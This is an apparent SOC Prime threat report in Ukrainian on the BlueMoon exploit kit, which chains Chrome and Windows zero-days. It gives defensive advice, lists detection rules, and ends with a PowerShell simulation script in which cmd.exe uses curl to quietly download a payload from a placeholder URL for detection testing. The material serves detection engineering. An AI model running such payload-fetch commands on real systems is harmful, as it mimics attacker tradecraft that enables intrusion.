SOC Prime Bias: Critical

10 Sep 2026 15:42 UTC

Zero-day уразливості в Chrome та Windows сприяють швидкому прийняттю акторами, що підтримуються державою

Author Photo
SOC Prime Team linkedin icon Стежити
Zero-day уразливості в Chrome та Windows сприяють швидкому прийняттю акторами, що підтримуються державою
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Кілька загроз, пов’язаних із шпигунством, використовують експлуатаційний набір BlueMoon, який об’єднує вразливості Chrome V8 з нульовим днем підвищення привілеїв Windows. Кампанія демонструє швидке операційне впровадження і може включати розробку експлойтів з використанням штучного інтелекту. Деякі актори, переважно з підозрюваним зв’язком з Китаєм, використовують набір для доставки різних шкідливих навантажень, включаючи шкідливі розширення браузера і бекдори.

Розслідування

Proofpoint виявила чотири різні кластерів загроз, що використовують набір BlueMoon, помічаючи подібні техніки оркестрації та завантаження, незважаючи на різниці в упаковці. Розслідування вияснило експлуатацію вразливостей патч-прогалин та поведінку після експлуатації, таку як DLL побічне завантаження та установка шкідливих розширень браузера. Технічний аналіз також виявив значне діагностичне логування та файли передачі розмітки, які можуть вказувати на розвиток з використанням штучного інтелекту.

Захист

Користувачі мають переконатися, що Chrome та інші браузери на базі Chromium оновлені до останніх стабільних релізів для усунення вразливостей V8. Організації повинні також приділити пріоритет увазі патчінгу Windows, щоб зменшити ризик підвищення привілеїв. Моніторинг підозрілих дерев процесів, включаючи chrome.exe запуску cmd.exe or curl.exe, і аудит за розкладом для незвичних імен рекомендуються.

Відповідь

Якщо буде виявлено експлуатацію BlueMoon, уражені кінцеві точки слід негайно ізолювати, щоб запобігти подальшому латеральному руху або ексфільтрації даних. Відповідальні особи повинні провести судову комп’ютерному аналізу пам’яті для виявлення DLL, завантажених відображенням, і перевірити системи на несанкціоновані розширення браузера. Команди безпеки повинні також полювати на механізми збереження, особливо підозрілі заплановані завдання і зміни реєстру в межах вузла CLSID.

Потік атаки

Ми ще оновлюємо цю частину.

Виявлення

Підозріле використання CURL (через cmdline)

Команда SOC Prime
10 вересня 2026

Підозрілі файли в загальному профілі користувача (через file_event)

Команда SOC Prime
10 вересня 2026

Можливе зловживання доменом розробки Cloudflare (через dns)

Команда SOC Prime
10 вересня 2026

Можлива спроба зв’язку з доменом перевірки IP (через dns)

Команда SOC Prime
10 вересня 2026

Підозріле командування та керування через незвичайний запит DNS верхнього рівня домену (TLD) (через dns)

Команда SOC Prime
10 вересня 2026

IOC (HashSha256) для виявлення: Раз у BlueMoon: Кілька загрозових акторів державного рівня швидко приймають новий експлуатаційний ланцюг, використовуючи нульові дні Chrome і Windows

Правила AI SOC Prime
10 вересня 2026

IOC (SourceIP) для виявлення: Раз у BlueMoon: Кілька загрозових акторів державного рівня швидко приймають новий експлуатаційний ланцюг, використовуючи нульові дні Chrome і Windows

Правила AI SOC Prime
10 вересня 2026

IOC (DestinationIP) для виявлення: Раз у BlueMoon: Кілька загрозових акторів державного рівня швидко приймають новий експлуатаційний ланцюг, використовуючи нульові дні Chrome і Windows

Правила AI SOC Prime
10 вересня 2026

Виявлення експлуатаційного ланцюга BlueMoon через Chrome до CMD і CURL виконання [Створення процесу Windows]

Правила AI SOC Prime
10 вересня 2026

Виконання моделювання

  • Опис атаки & команди: Противник націлить користувача, що переглядає Інтернет. Використовуючи вразливість у Chrome, зловмисник змушує браузер викликати командну оболонку. Щоб мінімізувати слід і уникнути безпосереднього завантаження великих файлів через браузер, зловмисник використовує cmd.exe для виклику curl. Команда спеціально використовує -sS -o флаги, щоб тихо завантажити навантаження з назвою msgbox.exe з віддаленого сервера, імітуючи поведінку експлуатації BlueMoon.

  • Скрипт регресивного тесту:

    # Імітація експлуатаційного ланцюга BlueMoon
    # Крок 1: Імітуйте, що Chrome є батьківським процесом (ми будемо використовувати обгортку PowerShell для імітації PID/дерева процесу, якщо це необхідно,
    # але для прямого тесту, ми запускаємо візерунок з командного рядка).
    
    $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe"
    $TargetDir = "$env:TEMPmsgbox.exe"
    
    Write-Host "[!] Починаємо імітацію BlueMoon..."
    
    # Щоб забезпечити триггер виявлення, ми повинні точно імітувати командний рядок, як визначено в правилі Sigma.
    # Примітка: у реальному оточенні chrome.exe був би батьком. 
    # Для цього скрипта ми виконуємо команду, на яку орієнтоване правило.
    
    Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait
    
    Write-Host "[+] Імітація завершена. Перевірте SIEM для виявлення."
  • Команди очищення:

    # Видалення імітованого навантаження
    Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue
    Write-Host "[+] Очищення завершено."